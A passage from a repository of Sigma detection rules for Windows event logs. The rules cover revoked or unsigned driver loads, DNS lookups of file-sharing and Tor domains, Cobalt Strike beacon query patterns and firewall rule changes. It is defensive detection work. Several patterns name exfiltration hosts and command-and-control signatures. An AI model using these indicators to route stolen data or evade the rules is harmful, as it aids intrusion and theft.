'\\Windows\\ImmersiveControlPanel\\SystemSettings.exe'\n        RequestedPolicy: 8\n    filter_optional_trend_micro:\n        FileNameBuffer|endswith: '\\Trend Micro\\Client Server Security Agent\\perficrcperfmonmgr.dll'\n        RequestedPolicy: 8\n    filter_optional_mdns_responder:\n        FileNameBuffer|endswith: '\\Program Files\\National Instruments\\Shared\\mDNS Responder\\nimdnsNSP.dll '\n    filter_optional_mcafee:\n        FileNameBuffer|endswith:\n            - '\\Program Files\\McAfee\\Endpoint Security\\Threat Prevention\\MfeAmsiProvider.dll'\n            - '\\Program Files\\McAfee\\MfeAV\\AMSIExt.dll'\n    filter_optional_eset:\n        FileNameBuffer|endswith: '\\Program Files\\ESET\\ESET Security\\eamsi.dll'\n    filter_optional_comodo:\n        FileNameBuffer|endswith: '\\Program Files\\comodo\\comodo internet security\\amsiprovider_x64.dll'\n    filter_optional_sentinel_one:\n        # Example: program files\\sentinelone\\sentinel agent 23.4.4.223\\inprocessclient64.dll\n        - FileNameBuffer|contains: '\\Program Files\\SentinelOne\\Sentinel Agent'\n        # Example: Program Files\\SentinelOne\\Sentinel Agent 23.4.4.223\\SentinelAgent.exe\n        - ProcessNameBuffer|contains: '\\Program Files\\SentinelOne\\Sentinel Agent'\n    filter_optional_national_instruments:\n        # Example: \\device\\harddiskvolume3\\program files\\national instruments\\shared\\mdns responder\\nimdnsnsp.dll\n        FileNameBuffer|contains: '\\National Instruments\\Shared\\mDNS Responder\\'\n    filter_optional_kaspersky:\n        # Example: \\Program Files (x86)\\Kaspersky Lab\\Kaspersky Endpoint Security for Windows\\x64\\antimalware_provider.dll\n        - ProcessNameBuffer|contains|all:\n              - '\\Kaspersky Lab\\'\n              - '\\avp.exe'\n        - FileNameBuffer|contains|all:\n              - '\\Kaspersky Lab\\'\n              - '\\antimalware_provider.dll'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Antivirus and other third party products are known to trigger this rule quite a lot. Initial filters and tuning is required before using this rule.\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml",
    "content": "title: CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked\nid: 5daf11c3-022b-4969-adb9-365e6c078c7c\nstatus: test\ndescription: Detects block events for files that are disallowed by code integrity for protected processes\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-06\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    service: codeintegrity-operational\ndetection:\n    selection:\n        EventID: 3104 # Windows blocked file %2 which has been disallowed for protected processes.\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml",
    "content": "title: CodeIntegrity - Blocked Image/Driver Load For Policy Violation\nid: e4be5675-4a53-426a-8c81-a8bb2387e947\nstatus: test\ndescription: Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy.\nreferences:\n    - https://twitter.com/wdormann/status/1590434950335320065\n    - https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-11-10\nmodified: 2023-06-07\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543\nlogsource:\n    product: windows\n    service: codeintegrity-operational\ndetection:\n    selection:\n        EventID: 3077 # Code Integrity determined that a process (%4) attempted to load %2 that did not meet the %5 signing level requirements or violated code integrity policy (Policy ID:%XX).\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml",
    "content": "title: CodeIntegrity - Blocked Driver Load With Revoked Certificate\nid: 9b72b82d-f1c5-4632-b589-187159bc6ec1\nstatus: test\ndescription: Detects blocked load attempts of revoked drivers\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-06\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543\nlogsource:\n    product: windows\n    service: codeintegrity-operational\ndetection:\n    selection:\n        EventID: 3023 # The driver %2 is blocked from loading as the driver has been revoked by Microsoft.\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml",
    "content": "title: CodeIntegrity - Revoked Kernel Driver Loaded\nid: 320fccbf-5e32-4101-82b8-2679c5f007c6\nstatus: test\ndescription: Detects the load of a revoked kernel driver\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-06\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    service: codeintegrity-operational\ndetection:\n    selection:\n        EventID:\n            - 3021 # Code Integrity determined a revoked kernel module %2 is loaded into the system.  Check with the publisher to see if a new signed version of the kernel module is available.\n            - 3022 # Code Integrity determined a revoked kernel module %2 is loaded into the system. The image is allowed to load because kernel mode debugger is attached.\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml",
    "content": "title: CodeIntegrity - Blocked Image Load With Revoked Certificate\nid: 6f156c48-3894-4952-baf0-16193e9067d2\nstatus: test\ndescription: Detects blocked image load events with revoked certificates by code integrity.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-06\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    service: codeintegrity-operational\ndetection:\n    selection:\n        EventID: 3036 # Windows is unable to verify the integrity of the file %2 because the signing certificate has been revoked.  Check with the publisher to see if a new signed version of the kernel module is available.\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml",
    "content": "title: CodeIntegrity - Revoked Image Loaded\nid: 881b7725-47cc-4055-8000-425823344c59\nstatus: test\ndescription: Detects image load events with revoked certificates by code integrity.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-06\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    service: codeintegrity-operational\ndetection:\n    selection:\n        EventID:\n            - 3032 # Code Integrity determined a revoked image %2 is loaded into the system. Check with the publisher to see if a new signed version of the image is available.\n            - 3035 # Code Integrity determined a revoked image %2 is loaded into the system. The image is allowed to load because kernel mode debugger is attached.\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml",
    "content": "title: CodeIntegrity - Unsigned Kernel Module Loaded\nid: 951f8d29-f2f6-48a7-859f-0673ff105e6f\nstatus: test\ndescription: Detects the presence of a loaded unsigned kernel module on the system.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-06\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    service: codeintegrity-operational\ndetection:\n    selection:\n        EventID: 3001 # Code Integrity determined an unsigned kernel module %2 is loaded into the system. Check with the publisher to see if a signed version of the kernel module is available\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml",
    "content": "title: CodeIntegrity - Unsigned Image Loaded\nid: c92c24e7-f595-493f-9c98-53d5142f5c18\nstatus: test\ndescription: Detects loaded unsigned image on the system\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-06\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    service: codeintegrity-operational\ndetection:\n    selection:\n        EventID: 3037 # Code Integrity determined an unsigned image %2 is loaded into the system. Check with the publisher to see if a signed version of the image is available.\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/code_integrity/win_codeintegrity_whql_failure.yml",
    "content": "title: CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module\nid: 2f8cd7a0-9d5a-4f62-9f8b-2c951aa0dd1f\nstatus: test\ndescription: Detects loaded kernel modules that did not meet the WHQL signing requirements.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-06\nmodified: 2023-06-14\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    service: codeintegrity-operational\ndetection:\n    selection:\n        EventID:\n            - 3082 # Code Integrity determined kernel module %2 that did not meet the WHQL requirements is loaded into the system. However, due to code integrity auditing policy, the image was allowed to load\n            - 3083 # Code Integrity determined kernel module %2 that did not meet the WHQL requirements is loaded into the system. Check with the publisher to see if a WHQL compliant kernel module is available\n    filter_optional_vmware:\n        FileNameBuffer:\n            - 'system32\\drivers\\vsock.sys'\n            - 'System32\\drivers\\vmci.sys'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml",
    "content": "title: Loading Diagcab Package From Remote Path\nid: 50cb47b8-2c33-4b23-a2e9-4600657d9746\nstatus: test\ndescription: Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability\nreferences:\n    - https://twitter.com/nas_bench/status/1539679555908141061\n    - https://twitter.com/j00sean/status/1537750439701225472\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-14\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    service: diagnosis-scripted\ndetection:\n    selection:\n        EventID: 101\n        PackagePath|contains: '\\\\\\\\' # Example would be: \\\\webdav-test.herokuapp.com@ssl\\DavWWWRoot\\package\n    condition: selection\nfalsepositives:\n    - Legitimate package hosted on a known and authorized remote location\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/dns_client/win_dns_client_anonymfiles_com.yml",
    "content": "title: DNS Query for Anonfiles.com Domain - DNS Client\nid: 29f171d7-aa47-42c7-9c7b-3c87938164d9\nrelated:\n    - id: 065cceea-77ec-4030-9052-fc0affea7110\n      type: similar\nstatus: test\ndescription: Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes\nreferences:\n    - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-16\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nlogsource:\n    product: windows\n    service: dns-client\n    definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'\ndetection:\n    selection:\n        EventID: 3008\n        QueryName|contains: '.anonfiles.com'\n    condition: selection\nfalsepositives:\n    - Rare legitimate access to anonfiles.com\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/dns_client/win_dns_client_mal_cobaltstrike.yml",
    "content": "title: Suspicious Cobalt Strike DNS Beaconing - DNS Client\nid: 0d18728b-f5bf-4381-9dcf-915539fff6c2\nrelated:\n    - id: f356a9c4-effd-4608-bbf8-408afd5cd006\n      type: similar\nstatus: test\ndescription: Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons\nreferences:\n    - https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns\n    - https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-16\ntags:\n    - attack.t1071.004\n    - attack.command-and-control\nlogsource:\n    product: windows\n    service: dns-client\n    definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'\ndetection:\n    selection_eid:\n        EventID: 3008\n    selection_query_1:\n        QueryName|startswith:\n            - 'aaa.stage.'\n            - 'post.1'\n    selection_query_2:\n        QueryName|contains: '.stage.123456.'\n    condition: selection_eid and 1 of selection_query_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/dns_client/win_dns_client_mega_nz.yml",
    "content": "title: DNS Query To MEGA Hosting Website - DNS Client\nid: 66474410-b883-415f-9f8d-75345a0a66a6\nrelated:\n    - id: 613c03ba-0779-4a53-8a1f-47f914a4ded3\n      type: similar\nstatus: test\ndescription: Detects DNS queries for subdomains related to MEGA sharing website\nreferences:\n    - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-16\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nlogsource:\n    product: windows\n    service: dns-client\n    definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'\ndetection:\n    selection:\n        EventID: 3008\n        QueryName|contains: 'userstorage.mega.co.nz'\n    condition: selection\nfalsepositives:\n    - Legitimate DNS queries and usage of Mega\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/dns_client/win_dns_client_put_io.yml",
    "content": "title: DNS Query To Put.io - DNS Client\nid: 8b69fd42-9dad-4674-abef-7fdef43ef92a\nstatus: test\ndescription: Detects DNS queries for subdomains related to \"Put.io\" sharing website.\nreferences:\n    - https://darkatlas.io/blog/medusa-ransomware-group-opsec-failure\nauthor: Omar Khaled (@beacon_exe)\ndate: 2024-08-23\ntags:\n    - attack.command-and-control\nlogsource:\n    product: windows\n    service: dns-client\n    definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'\ndetection:\n    selection:\n        EventID: 3008\n        QueryName|contains:\n            - 'api.put.io'\n            - 'upload.put.io'\n    condition: selection\nfalsepositives:\n    - Legitimate DNS queries and usage of Put.io\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/dns_client/win_dns_client_tor_onion.yml",
    "content": "title: Query Tor Onion Address - DNS Client\nid: 8384bd26-bde6-4da9-8e5d-4174a7a47ca2\nrelated:\n    - id: b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544\n      type: similar\n    - id: a8322756-015c-42e7-afb1-436e85ed3ff5\n      type: similar\nstatus: test\ndescription: Detects DNS resolution of an .onion address related to Tor routing networks\nreferences:\n    - https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/\n    - https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-02-20\nmodified: 2025-09-12\ntags:\n    - attack.command-and-control\n    - attack.t1090.003\nlogsource:\n    product: windows\n    service: dns-client\n    definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'\ndetection:\n    selection:\n        EventID: 3008\n        QueryName|endswith:\n            - '.hiddenservice.net'\n            - '.onion.ca'\n            - '.onion.cab'\n            - '.onion.casa'\n            - '.onion.city'\n            - '.onion.direct'\n            - '.onion.dog'\n            - '.onion.glass'\n            - '.onion.gq'\n            - '.onion.guide'\n            - '.onion.in.net'\n            - '.onion.ink'\n            - '.onion.it'\n            - '.onion.link'\n            - '.onion.lt'\n            - '.onion.lu'\n            - '.onion.ly'\n            - '.onion.mn'\n            - '.onion.network'\n            - '.onion.nu'\n            - '.onion.pet'\n            - '.onion.plus'\n            - '.onion.pt'\n            - '.onion.pw'\n            - '.onion.rip'\n            - '.onion.sh'\n            - '.onion.si'\n            - '.onion.to'\n            - '.onion.top'\n            - '.onion.ws'\n            - '.onion'\n            - '.s1.tor-gateways.de'\n            - '.s2.tor-gateways.de'\n            - '.s3.tor-gateways.de'\n            - '.s4.tor-gateways.de'\n            - '.s5.tor-gateways.de'\n            - '.t2w.pw'\n            - '.tor2web.ae.org'\n            - '.tor2web.blutmagie.de'\n            - '.tor2web.com'\n            - '.tor2web.fi'\n            - '.tor2web.io'\n            - '.tor2web.org'\n            - '.tor2web.xyz'\n            - '.torlink.co'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/dns_client/win_dns_client_ufile_io.yml",
    "content": "title: DNS Query To Ufile.io - DNS Client\nid: 090ffaad-c01a-4879-850c-6d57da98452d\nrelated:\n    - id: 1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b\n      type: similar\nstatus: test\ndescription: Detects DNS queries to \"ufile.io\", which was seen abused by malware and threat actors as a method for data exfiltration\nreferences:\n    - https://thedfirreport.com/2021/12/13/diavol-ransomware/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-16\nmodified: 2023-09-18\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nlogsource:\n    product: windows\n    service: dns-client\n    definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'\ndetection:\n    selection:\n        EventID: 3008\n        QueryName|contains: 'ufile.io'\n    condition: selection\nfalsepositives:\n    - DNS queries for \"ufile\" are not malicious by nature necessarily. Investigate the source to determine the necessary actions to take\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml",
    "content": "title: Failed DNS Zone Transfer\nid: 6d444368-6da1-43fe-b2fc-44202430480e\nstatus: test\ndescription: Detects when a DNS zone transfer failed.\nreferences:\n    - https://kb.eventtracker.com/evtpass/evtpages/EventId_6004_Microsoft-Windows-DNS-Server-Service_65410.asp\nauthor: Zach Mathis\ndate: 2023-05-24\ntags:\n    - attack.reconnaissance\n    - attack.t1590.002\nlogsource:\n    product: windows\n    service: dns-server\ndetection:\n    selection:\n        EventID: 6004 # The DNS server received a zone transfer request from %1 for a non-existent or non-authoritative zone %2.\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml",
    "content": "title: DNS Server Error Failed Loading the ServerLevelPluginDLL\nid: cbe51394-cd93-4473-b555-edf0144952d9\nrelated:\n    - id: e61e8a88-59a9-451c-874e-70fcc9740d67\n      type: derived\n    - id: f63b56ee-3f79-4b8a-97fb-5c48007e8573\n      type: derived\nstatus: test\ndescription: Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded\nreferences:\n    - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83\n    - https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx\n    - https://twitter.com/gentilkiwi/status/861641945944391680\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-05-08\nmodified: 2023-02-05\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    service: dns-server\ndetection:\n    selection:\n        EventID:\n            - 150\n            - 770\n            - 771\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml",
    "content": "title: USB Device Plugged\nid: 1a4bd6e3-4c6e-405d-a9a3-53a116e341d4\nstatus: test\ndescription: Detects plugged/unplugged USB devices\nreferences:\n    - https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/\n    - https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-11-09\nmodified: 2021-11-30\ntags:\n    - attack.initial-access\n    - attack.t1200\nlogsource:\n    product: windows\n    service: driver-framework\n    definition: 'Requires enabling and collection of the Microsoft-Windows-DriverFrameworks-UserMode/Operational eventlog'\ndetection:\n    selection:\n        EventID:\n            - 2003  # Loading drivers\n            - 2100  # Pnp or power management\n            - 2102  # Pnp or power management\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activity\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml",
    "content": "title: Uncommon New Firewall Rule Added In Windows Firewall Exception List\nid: cde0a575-7d3d-4a49-9817-b8004a7bf105\nstatus: test\ndescription: Detects when a rule has been added to the Windows Firewall exception list\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)\nauthor: frack113\ndate: 2022-02-19\nmodified: 2025-10-08\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: windows\n    service: firewall-as\ndetection:\n    selection:\n        EventID:\n            - 2004 # A rule has been added to the Windows Defender Firewall exception list\n            - 2071 # A rule has been added to the Windows Defender Firewall exception list. (Windows 11)\n            - 2097\n    filter_main_block:\n        Action: 2 # Block\n    filter_main_generic:\n        ApplicationPath|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    filter_main_covered_paths:\n        # This filter is added to avoid duplicate alerting from 9e2575e7-2cb9-4da1-adc8-ed94221dca5e\n        ApplicationPath|contains:\n            - 'C:\\PerfLogs\\'\n            - 'C:\\Temp\\'\n            - 'C:\\Tmp\\'\n            - 'C:\\Users\\Public\\'\n            - 'C:\\Windows\\Tasks\\'\n            - 'C:\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n    filter_main_system_dllhost:\n        ApplicationPath: 'System'\n        ModifyingApplication: 'C:\\Windows\\System32\\dllhost.exe'\n    filter_main_tiworker:\n        ModifyingApplication|startswith: 'C:\\Windows\\WinSxS\\'\n        ModifyingApplication|endswith: '\\TiWorker.exe'\n    filter_main_null:\n        ApplicationPath: null\n    filter_optional_no_path:\n        # This filter filters a lot of FPs related to Windows Services\n        ModifyingApplication:\n            - 'C:\\Windows\\System32\\svchost.exe'\n            - 'C:\\Windows\\System32\\dllhost.exe'\n        ApplicationPath: ''\n    filter_optional_msmpeng:\n        - ModifyingApplication|startswith:\n              - 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n              - 'C:\\Program Files\\Windows Defender\\'\n          ModifyingApplication|endswith: '\\MsMpEng.exe'\n        - ApplicationPath|startswith:\n              - 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n              - 'C:\\Program Files\\Windows Defender\\'\n          ApplicationPath|endswith: '\\MsMpEng.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml",
    "content": "title: New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application\nid: 9e2575e7-2cb9-4da1-adc8-ed94221dca5e\nrelated:\n    - id: cde0a575-7d3d-4a49-9817-b8004a7bf105\n      type: derived\nstatus: test\ndescription: Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)\n    - https://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/#\nauthor: frack113\ndate: 2023-02-26\nmodified: 2024-05-10\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: windows\n    service: firewall-as\ndetection:\n    selection:\n        EventID:\n            - 2004 # A rule has been added to the Windows Defender Firewall exception list. (Windows 10)\n            - 2071 # A rule has been added to the Windows Defender Firewall exception list. (Windows 11)\n            - 2097\n        ApplicationPath|contains:\n            - ':\\PerfLogs\\'\n            - ':\\Temp\\'\n            - ':\\Tmp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Tasks\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n    filter_main_block:\n        Action: 2 # Block\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/firewall_as/win_firewall_as_add_rule_wmiprvse.yml",
    "content": "title: New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE\nid: eca81e8d-09e1-4d04-8614-c91f44fd0519\nstatus: test\ndescription: |\n    Detects the addition of a new \"Allow\" firewall rule by the WMI process (WmiPrvSE.EXE).\n    This can occur if an attacker leverages PowerShell cmdlets such as \"New-NetFirewallRule\", or directly uses WMI CIM classes such as \"MSFT_NetFirewallRule\".\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-24---set-a-firewall-rule-using-new-netfirewallrule\n    - https://malware.news/t/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/72170\n    - https://cybersecuritynews.com/rhysida-ransomware-attacking-windows/\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-05-10\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: windows\n    service: firewall-as\ndetection:\n    selection:\n        EventID:\n            - 2004 # A rule has been added to the Windows Defender Firewall exception list\n            - 2071 # A rule has been added to the Windows Defender Firewall exception list. (Windows 11)\n            - 2097\n        Action: 3 # Allow\n        ModifyingApplication|endswith: ':\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n    condition: selection\nfalsepositives:\n    - Administrator scripts or activity.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/firewall_as/win_firewall_as_delete_all_rules.yml",
    "content": "title: All Rules Have Been Deleted From The Windows Firewall Configuration\nid: 79609c82-a488-426e-abcf-9f341a39365d\nstatus: test\ndescription: Detects when a all the rules have been deleted from the Windows Defender Firewall configuration\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-17\nmodified: 2024-01-22\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: windows\n    service: firewall-as\ndetection:\n    selection:\n        EventID:\n            - 2033 # All rules have been deleted from the Windows Defender Firewall configuration on this computer\n            - 2059 # All rules have been deleted from the Windows Defender Firewall configuration on this computer. (Windows 11)\n    filter_main_svchost:\n        ModifyingApplication|endswith: ':\\Windows\\System32\\svchost.exe'\n    filter_optional_msmpeng:\n        ModifyingApplication|contains|all:\n            - ':\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n            - '\\MsMpEng.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/firewall_as/win_firewall_as_delete_rule.yml",
    "content": "title: A Rule Has Been Deleted From The Windows Firewall Exception List\nid: c187c075-bb3e-4c62-b4fa-beae0ffc211f\nstatus: test\ndescription: Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)\nauthor: frack113\ndate: 2022-02-19\nmodified: 2024-08-29\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: windows\n    service: firewall-as\ndetection:\n    selection:\n        EventID:\n            - 2006 # A rule has been deleted in the Windows Defender Firewall exception list\n            - 2052 # A rule has been deleted in the Windows Defender Firewall exception list. (Windows 11)\n    filter_main_generic:\n        ModifyingApplication|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\WinSxS\\'\n    filter_main_svchost:\n        ModifyingApplication: 'C:\\Windows\\System32\\svchost.exe'\n    filter_optional_msmpeng:\n        ModifyingApplication|startswith: 